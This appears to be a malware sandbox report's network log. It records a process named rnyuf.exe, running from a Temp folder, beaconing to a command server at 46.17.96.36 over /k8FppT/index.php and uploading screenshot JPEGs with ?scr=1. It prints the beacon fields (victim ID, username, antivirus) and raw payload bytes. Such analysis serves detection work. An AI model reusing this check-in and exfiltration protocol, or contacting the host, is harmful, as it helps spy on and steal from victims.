                                        Data Ascii: $bRbKHiJ(4R)/j()E'z^QGj1EP `RSQE-Q@E(QE--)(P)ZZJQS4Z(dKIKL)hRP)xQuU3N*%@ip34$S4iSdUA5.6Sbj}+"z*c4Z2c1J.=-.(p
                                        Aug 29, 2021 22:27:45.155014038 CEST9235OUTData Raw: c9 6e 8e 78 21 1e b4 a1 71 5b de 5d b3 75 41 49 f6 3b 56 f6 a3 d8 8f eb 2b aa 30 f1 4e 03 35 b2 74 d8 8f dd 62 29 87 4a 3d 9c 7e 22 8f 64 d0 7d 62 06 5e da 70 15 7c e9 92 8e 98 35 1b 58 cc bc ed a3 91 87 b5 8b ea 56 c5 2e 2a 53 6e e3 aa 9a 6f 96
                                        Data Ascii: nx!q[]uAI;V+0N5tb)J=~"d}b^p|5XV.*SnoGo(OhNT7O)UCe*ANO3+<]S<y^G^]*chT)Fc)K|]j}(BK,K\S&Kp+b1Eq1Y
                                        Aug 29, 2021 22:27:45.188471079 CEST9244OUTData Raw: db 47 8e 09 21 7b 57 b9 cb 36 65 79 23 75 7d bf 2b a6 fc 06 c1 c8 ce 46 18 8a ae ba db 9f 11 69 3a c9 b3 20 e9 c9 68 a2 1f 37 fd 67 90 aa 3e f6 38 dd b7 d0 e3 3d e9 c1 d6 be bd ff 00 0d 45 35 47 5b 7f 5b 17 f5 2d 06 da 0f 0a da 6a 96 73 4d 25 d6
                                        Data Ascii: G!{W6ey#u}+Fi: h7g>8=E5G[[-jsM%$ N+8@nf7muxuydTK<& L6G42E#K3jP{;GwR7`+,PPt*NOJ-KV-?3a:X2IM3
                                        Aug 29, 2021 22:27:45.188586950 CEST9265OUTData Raw: e1 0a 50 29 45 2d 32 4b 3a 7b 2c 57 d1 bb b0 55 19 c9 3f 43 5d 64 37 b7 97 1a 7b da c1 73 3c b6 48 c1 de 24 90 98 d5 8f 42 40 e0 1e 0f 3e d5 c4 9a ed be 1e fc 41 ff 00 84 13 fb 47 fe 25 7f 6e fb 6f 95 ff 00 2f 1e 56 cd 9b ff 00 d9 6c e7 7f b7 4a
                                        Data Ascii: P)E-2K:{,WU?C]d7{s<H$B@>AG%no/VlJ)j:QI/ntMb^.$N\E:x|nTc#RIUZcN1s^jay'P{l3xD!|8;RIU
                                        Aug 29, 2021 22:27:45.188836098 CEST9278OUTData Raw: 4e 02 80 38 a7 01 4c 86 ce 97 c2 6b 98 f5 1f fa e4 3f 91 ae 74 f0 ed f5 ae a7 c1 f1 ee 83 53 3f f4 cb fa 1a e6 18 7c c7 eb 5c 14 25 fb fa 8b d0 ea ae ad 42 0f d4 6d 18 a5 c5 18 ae db 9c 37 12 9c 28 c5 00 50 20 a5 a5 c5 2e 3d aa 5b 10 98 a3 14 f0
                                        Data Ascii: N8Lk?tS?|\%Bm7(P .=[xF?AR[i?CU?H=9WeImd[k4>f)w5X*sJ1]/f@7yZKI/&:Z{77?/mZ_Z+
                                        Aug 29, 2021 22:27:45.188925982 CEST9281OUTData Raw: cd a4 33 55 43 2d 31 a5 a3 98 6a 91 6c cf 51 b4 f5 51 a6 a8 5a 7a 97 34 8d 63 44 b6 f3 fb d4 0f 3f bd 54 79 8d 40 f3 56 32 aa 74 42 89 69 e7 f7 aa af 35 40 d2 d4 2d 25 73 ce a9 d3 0a 56 25 79 32 6a 26 7c d4 45 e9 bb ab 07 3b 9d 0a 16 1e ed 51 16
                                        Data Ascii: 3UC-1jlQQZz4cD?Ty@V2tBi5@-%sV%y2j&|E;Qe)F"4Av)hh,&RPFURKI5/'G1e a@x9'-/&pRwg5Ua^W4-rVzVbKLex_c[cI?xM{d,6
                                        Aug 29, 2021 22:27:45.295049906 CEST9308INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:27:45 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        92192.168.2.44983046.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:27:45.161400080 CEST9236OUTPOST /k8FppT/index.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        Host: 46.17.96.36
                                        Content-Length: 82
                                        Cache-Control: no-cache
                                        Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                        Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
                                        Aug 29, 2021 22:27:45.242002964 CEST9308INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:27:45 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: 6<c><d>0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        93192.168.2.44983146.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:27:45.407157898 CEST9309OUTPOST /k8FppT/index.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        Host: 46.17.96.36
                                        Content-Length: 82
                                        Cache-Control: no-cache
                                        Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                        Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
                                        Aug 29, 2021 22:27:45.485354900 CEST9310INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:27:45 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: 6<c><d>0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        94192.168.2.44983246.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:27:45.512695074 CEST9310OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                                        Content-Type: multipart/form-data; boundary=----2527d6ee36e5d91ced907633b787976c
                                        Host: 46.17.96.36
                                        Content-Length: 110710
                                        Cache-Control: no-cache
                                        Aug 29, 2021 22:27:45.512759924 CEST9310OUTData Raw: 2d 2d 2d 2d 2d 2d 32 35 32 37 64 36 65 65 33 36 65 35 64 39 31 63 65 64 39 30 37 36 33 33 62 37 38 37 39 37 36 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                        Data Ascii: ------2527d6ee36e5d91ced907633b787976cContent-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                        Aug 29, 2021 22:27:45.512928009 CEST9320OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                        Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                        Aug 29, 2021 22:27:45.513029099 CEST9323OUTData Raw: 28 a0 06 e3 14 94 fa 31 45 82 e3 29 71 ed 4e 2b 48 45 2b 0e e3 68 22 97 14 51 60 b8 dc 50 69 71 45 03 1b 8e 69 71 4b 45 20 b8 da 4c 53 b1 46 28 b0 c6 e2 8c 53 b1 49 4a c1 71 39 a3 9a 31 46 28 18 94 52 d1 cd 20 1a 68 c5 2d 14 0c 6d 14 ea 28 01 a6
                                        Data Ascii: (1E)qN+HE+h"Q`PiqEiqKE LSF(SIJq91F(R h-m(R(RJZ((,QN4X.%-sNBJ\QLJ)h4wSZu_*>*:0}7{S:r^#(psQ3\zyjf-N~ck
                                        Aug 29, 2021 22:27:45.547804117 CEST9326OUTData Raw: 14 4e 49 3f af e4 6b c5 3e 37 7f c9 47 97 fe bd 62 fe 55 ef 1a 0f 87 5f 4e b9 9b 52 d4 6e 7e d9 aa dc 0c 49 36 30 a8 bf dd 51 d8 7f 9e 2b c1 fe 36 ff 00 c9 47 9b fe bd a2 fe 55 cd cd 1e 68 c2 2e e9 2d ce 95 19 72 ca 72 56 6d ec 79 cd 2d 1c d1 cd
                                        Data Ascii: NI?k>7GbU_NRn~I60Q+6GUh.-rrVmy-j@QE{G`i.tt{>`o;g8k<)rQXTnA*A\so&?!l9+J')^?G*+?j:S7?tj?f
                                        Aug 29, 2021 22:27:45.547848940 CEST9329OUTData Raw: 71 e8 69 3e c7 75 f6 98 6d be cb 3f 9f 38 43 14 5e 59 dd 20 7c 6d da 31 93 9c 8c 63 ae 6b 27 46 32 77 6f 52 d5 59 25 64 8f a0 f5 8f 88 1f 0f 13 c2 5a ed 8e 91 a9 e2 e6 f6 c6 68 51 3c 8b 8f 9d cc 6c 14 65 97 03 96 f6 af 9d 2a 79 ad 2e ad e1 86 69
                                        Data Ascii: qi>um?8C^Y |m1ck'F2woRY%dZhQ<le*y.i)yO$eVM\q$:&"[1I-$"&$1@UFL)QG4Z9)QERRR({sLJQKH(f@w(OxG?+,k4ja'P@9oa
                                        Aug 29, 2021 22:27:45.547863960 CEST9334OUTData Raw: ba 35 bf 88 de d6 e3 7c 45 70 f3 c4 b7 53 79 90 27 f7 5b 23 71 5f e2 0b 81 d3 0d 24 13 e8 cb e3 9f 08 c7 71 a7 6a 32 5f 79 1a 58 13 47 7c 89 10 3b 23 c6 63 30 93 c7 71 bf 9f 6a f3 61 0c 7e 94 a2 14 03 00 70 69 c6 8c 93 bd fa df f3 ff 00 30 9d 65
                                        Data Ascii: 5|EpSy'[#q_$qj2_yXG|;#c0qja~pi0e+hwxv+u0\?U?]Lo.<N|Wr6D$?m9A8q/A=*VVbMobiGFb)|lJ(EQ!EPIKI@QQbQ@
                                        Aug 29, 2021 22:27:45.548204899 CEST9343OUTData Raw: 9f 7e e3 de bd 0a cb c6 cc be 2f 6b 7b b9 91 b4 bb f4 47 b3 90 0c 04 c8 c0 cf e3 90 73 d0 8a f3 6f f8 47 35 cf fa 02 ea 3f f8 0a ff 00 e1 52 1d 0b c4 0d 02 42 da 3e a2 51 09 2a 0d ab f1 9e bd bd 85 7a f5 f0 f8 7a ce ed ad ad fd 7a 1e 3d 0c 46 22
                                        Data Ascii: ~/k{GsoG5?RB>Q*zzz=F"O{^U#ZxbATd0RGc_>)vz("<KNkKqvFvaqRiAQH((ZJ`R1@QE(((RE-((v)
                                        Aug 29, 2021 22:27:45.548228025 CEST9348OUTData Raw: f4 b5 ad fd 75 3d b2 d3 5b b7 d7 e1 f0 fd f4 18 05 af 19 64 8f 39 28 e2 de 6c 8f f3 da bc 5b e3 3f fc 94 39 bf eb da 2f e5 5d 27 80 ee 58 f8 d6 ce 18 8b 25 b4 92 49 27 95 9c 80 44 52 01 f9 06 23 35 cd fc 65 ff 00 92 87 37 fd 7b c5 ff 00 a0 d7 95
                                        Data Ascii: u=[d9(l[?9/]'X%I'DR#5e7{ZP[[gBs{GRKE%;oij}p&kN^.MH/<[B"<c/ci7qZ[S,*{{{KO^gr.ry/(A}+!76
                                        Aug 29, 2021 22:27:45.583421946 CEST9351OUTData Raw: db 47 8e 09 21 7b 57 b9 cb 36 65 79 23 75 7d bf 2b a6 fc 06 c1 c8 ce 46 18 8a ae ba db 9f 11 69 3a c9 b3 20 e9 c9 68 a2 1f 37 fd 67 90 aa 3e f6 38 dd b7 d0 e3 3d e9 c1 d6 be bd ff 00 0d 45 35 47 5b 7f 5b 17 f5 2d 06 da 0f 0a da 6a 96 73 4d 25 d6
                                        Data Ascii: G!{W6ey#u}+Fi: h7g>8=E5G[[-jsM%$ N+8@nf7muxuydTK<& L6G42E#K3jP{;GwR7`+,PPt*NOJ-KV-?3a:X2IM3
                                        Aug 29, 2021 22:27:45.583470106 CEST9354OUTData Raw: 53 15 1b 68 d6 d2 72 8f 8a af ac 47 a9 5c ac e6 68 ad e9 3c 3c df c0 ea 6a ac 9a 25 ca 74 5c 8f 6a b5 5a 0f a8 9a 6b 74 65 d2 d5 97 b0 b8 8f ac 6c 3f 0a 81 a2 71 d5 4d 5a 92 62 19 9a 5a 31 8a 00 aa 10 52 e6 92 81 40 0e 06 9d 9a 65 38 75 a6 48 f0
                                        Data Ascii: ShrG\h<<j%t\jZktel?qMZbZ1R@e8uHjqGTY&1{3IN4,}RZJZJ)h@J(4Q@hQ(Q@Q@SiGZ-QM(R)@8pN"1NWbHJm<MK)#)i8R1E^)hh
                                        Aug 29, 2021 22:27:45.691963911 CEST9423INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:27:45 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        95192.168.2.44983346.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:27:45.628518105 CEST9422OUTPOST /k8FppT/index.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        Host: 46.17.96.36
                                        Content-Length: 82
                                        Cache-Control: no-cache
                                        Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                        Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
                                        Aug 29, 2021 22:27:45.704760075 CEST9423INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:27:45 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: 6<c><d>0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        96192.168.2.44983446.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:27:45.870541096 CEST9424OUTPOST /k8FppT/index.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        Host: 46.17.96.36
                                        Content-Length: 82
                                        Cache-Control: no-cache
                                        Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                        Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
                                        Aug 29, 2021 22:27:45.944459915 CEST9424INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:27:45 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: 6<c><d>0
                                        Aug 29, 2021 22:27:46.429297924 CEST9425OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                                        Content-Type: multipart/form-data; boundary=----2527d6ee36e5d91ced907633b787976c
                                        Host: 46.17.96.36
                                        Content-Length: 110710
                                        Cache-Control: no-cache
                                        Aug 29, 2021 22:27:46.429374933 CEST9425OUTData Raw: 2d 2d 2d 2d 2d 2d 32 35 32 37 64 36 65 65 33 36 65 35 64 39 31 63 65 64 39 30 37 36 33 33 62 37 38 37 39 37 36 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                        Data Ascii: ------2527d6ee36e5d91ced907633b787976cContent-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                        Aug 29, 2021 22:27:46.429548025 CEST9435OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                        Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                        Aug 29, 2021 22:27:46.429627895 CEST9437OUTData Raw: 28 a0 06 e3 14 94 fa 31 45 82 e3 29 71 ed 4e 2b 48 45 2b 0e e3 68 22 97 14 51 60 b8 dc 50 69 71 45 03 1b 8e 69 71 4b 45 20 b8 da 4c 53 b1 46 28 b0 c6 e2 8c 53 b1 49 4a c1 71 39 a3 9a 31 46 28 18 94 52 d1 cd 20 1a 68 c5 2d 14 0c 6d 14 ea 28 01 a6
                                        Data Ascii: (1E)qN+HE+h"Q`PiqEiqKE LSF(SIJq91F(R h-m(R(RJZ((,QN4X.%-sNBJ\QLJ)h4wSZu_*>*:0}7{S:r^#(psQ3\zyjf-N~ck
                                        Aug 29, 2021 22:27:46.462553024 CEST9454OUTData Raw: 14 4e 49 3f af e4 6b c5 3e 37 7f c9 47 97 fe bd 62 fe 55 ef 1a 0f 87 5f 4e b9 9b 52 d4 6e 7e d9 aa dc 0c 49 36 30 a8 bf dd 51 d8 7f 9e 2b c1 fe 36 ff 00 c9 47 9b fe bd a2 fe 55 cd cd 1e 68 c2 2e e9 2d ce 95 19 72 ca 72 56 6d ec 79 cd 2d 1c d1 cd
                                        Data Ascii: NI?k>7GbU_NRn~I60Q+6GUh.-rrVmy-j@QE{G`i.tt{>`o;g8k<)rQXTnA*A\so&?!l9+J')^?G*+?j:S7?tj?f
                                        Aug 29, 2021 22:27:46.462610006 CEST9459OUTData Raw: b3 13 c9 24 f7 34 66 bb 23 b2 4c e4 95 9b 6d 0e f2 d4 f7 a4 31 0f 5a 4e 69 72 6a b4 27 51 3c 9f 7a 3c 93 4b b8 d2 ef 34 59 0e f2 19 e5 35 21 42 2a 5f 33 da 9d e6 0f 4a 2c 85 76 56 c1 f4 a5 c7 b5 58 dc a7 b5 38 04 3d a8 e4 0e 72 a5 15 68 c6 9d 8d
                                        Data Ascii: $4f#Lm1ZNirj'Q<z<K4Y5!B*_3J,vVX8=rh'Mjoy+dCKRy,)l;Qf;SNYQE%(QKLAEPEJ(,!(bbQE)iZ){!i`Z))EIAKE-)j,(SR>Sii:@PE-B
                                        Aug 29, 2021 22:27:46.462629080 CEST9464OUTData Raw: b5 1a 90 b5 c9 78 47 14 e5 4e a2 76 3e 52 ef 5e 95 f0 3d 51 fc 79 2a ba ab 29 b1 93 21 86 47 de 4a f3 5a eb 3e 1e 78 a6 d3 c1 fe 24 7d 4e f2 de 69 e2 36 ef 10 48 b1 92 49 5f 52 38 e0 d7 9d 51 37 06 91 ed 53 69 49 36 7a 94 7e 28 bd be f1 84 70 d8
                                        Data Ascii: xGNv>R^=Qy*)!GJZ>x$}Ni6HI_R8Q7SiI6z~(pI-{d\#8$/exjQUUf 8fg4Rfy^8#TZ#Qu]oIV}+mmkEx[II uH {
                                        Aug 29, 2021 22:27:46.494832039 CEST9488OUTData Raw: 90 14 6d a2 48 8b 15 03 e6 fb a4 b1 c8 ce 7d c5 72 5a aa b7 e3 f7 af d2 e7 53 74 da 7f 81 62 1f 09 c9 3b ed 1a c6 94 aa f7 26 ce dd dd e5 0b 73 30 00 b2 21 f2 f8 c1 65 05 9b 6a e4 f0 48 e6 8b 3f 05 dd dd 5b da c9 f6 ed 36 09 ee a3 9a 58 6d a6 99
                                        Data Ascii: mH}rZStb;&s0!ejH?[6Xm3,$dtznDmaaw5\#m3c,XTq1J,$+X\[#8b]f7cu?VMK_j0X\[^A5KtP?0O~6\vOn[28
                                        Aug 29, 2021 22:27:46.494915009 CEST9496OUTData Raw: ff 00 84 6b 5f 92 c1 65 69 23 da 24 8d 9d 0a 36 d3 9c 64 10 0e 78 ad a9 56 e7 d1 ee 63 56 97 26 ab 63 0c 75 a7 f6 a6 53 bb 57 42 30 61 de 9e 29 29 d5 44 b2 c5 95 a4 fa 85 f5 bd 95 ac 7e 65 c5 c4 ab 14 49 90 37 3b 10 00 c9 e0 72 7b d7 61 ff 00 0a
                                        Data Ascii: k_ei#$6dxVcV&cuSWB0a))D~eI7;r{a??gZT~C+iSH6Q7Tuo~,P;uG&8$#$BN'T7CLK;o9LH~.fUM?
                                        Aug 29, 2021 22:27:46.494939089 CEST9506OUTData Raw: 5b bb d6 35 6b e5 d4 16 e2 fe 46 4d 42 75 b8 ba 40 02 ac b2 2e 70 48 03 1c 64 f0 38 e9 e8 2a 79 fc 43 ad 5d 5e c3 79 35 f7 fa 44 17 4d 79 1b a4 48 84 4c c4 12 e7 68 19 3f 28 eb 9c 01 8e 95 9a 29 7b d6 6a 94 17 42 9d 49 3d 2e 4d 77 7b 77 7e b0 25
                                        Data Ascii: [5kFMBu@.pHd8*yC]^y5DMyHLh?(){jBI=.Mw{w~%naUP gg`'8TRu+7VUamq#FG5HNsJoj:xcDk`v3qgU47NT8m?7}:UN8%NA]]u&IE\RJ6Uj 7
                                        Aug 29, 2021 22:27:46.495474100 CEST9517OUTData Raw: 0d de 9f de 5f ce 8d e9 fd e5 fc e9 d4 50 03 77 a7 f7 97 f3 a3 7a 7f 79 7f 3a 75 14 00 dd e9 fd e5 fc e8 de 9f de 5f ce 9d 45 00 37 7a 7f 79 7f 3a 37 a7 f7 97 f3 a7 51 40 0d de 9f de 5f ce 8d e9 fd e5 fc e9 d4 50 03 77 a7 f7 97 f3 a3 7a 7f 79 7f
                                        Data Ascii: _Pwzy:u_E7zy:7Q@_Pwzy:u_E7zy:7Q@_Pwzy:u_E7zy:7Q@_Pwzy:u_E7zy: M%=}_8
                                        Aug 29, 2021 22:27:46.604532003 CEST9536INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:27:46 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        97192.168.2.44983546.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:27:46.574080944 CEST9535OUTPOST /k8FppT/index.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        Host: 46.17.96.36
                                        Content-Length: 82
                                        Cache-Control: no-cache
                                        Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                        Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
                                        Aug 29, 2021 22:27:46.653001070 CEST9536INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:27:46 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: 6<c><d>0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        98192.168.2.44983646.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:27:46.811566114 CEST9537OUTPOST /k8FppT/index.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        Host: 46.17.96.36
                                        Content-Length: 82
                                        Cache-Control: no-cache
                                        Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                        Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
                                        Aug 29, 2021 22:27:46.889429092 CEST9576INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:27:46 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: 6<c><d>0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        99192.168.2.44983746.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:27:46.847887039 CEST9537OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                                        Content-Type: multipart/form-data; boundary=----2c09df93ad9fbf4372f0aa685f89642f
                                        Host: 46.17.96.36
                                        Content-Length: 110773
                                        Cache-Control: no-cache
                                        Aug 29, 2021 22:27:46.848011017 CEST9537OUTData Raw: 2d 2d 2d 2d 2d 2d 32 63 30 39 64 66 39 33 61 64 39 66 62 66 34 33 37 32 66 30 61 61 36 38 35 66 38 39 36 34 32 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                        Data Ascii: ------2c09df93ad9fbf4372f0aa685f89642fContent-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                        Aug 29, 2021 22:27:46.848124027 CEST9547OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                        Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                        Aug 29, 2021 22:27:46.848232985 CEST9550OUTData Raw: 28 a0 06 e3 14 94 fa 31 45 82 e3 29 71 ed 4e 2b 48 45 2b 0e e3 68 22 97 14 51 60 b8 dc 50 69 71 45 03 1b 8e 69 71 4b 45 20 b8 da 4c 53 b1 46 28 b0 c6 e2 8c 53 b1 49 4a c1 71 39 a3 9a 31 46 28 18 94 52 d1 cd 20 1a 68 c5 2d 14 0c 6d 14 ea 28 01 a6
                                        Data Ascii: (1E)qN+HE+h"Q`PiqEiqKE LSF(SIJq91F(R h-m(R(RJZ((,QN4X.%-sNBJ\QLJ)h4wSZu_*>*:0}7{S:r^#(psQ3\zyjf-N~ck
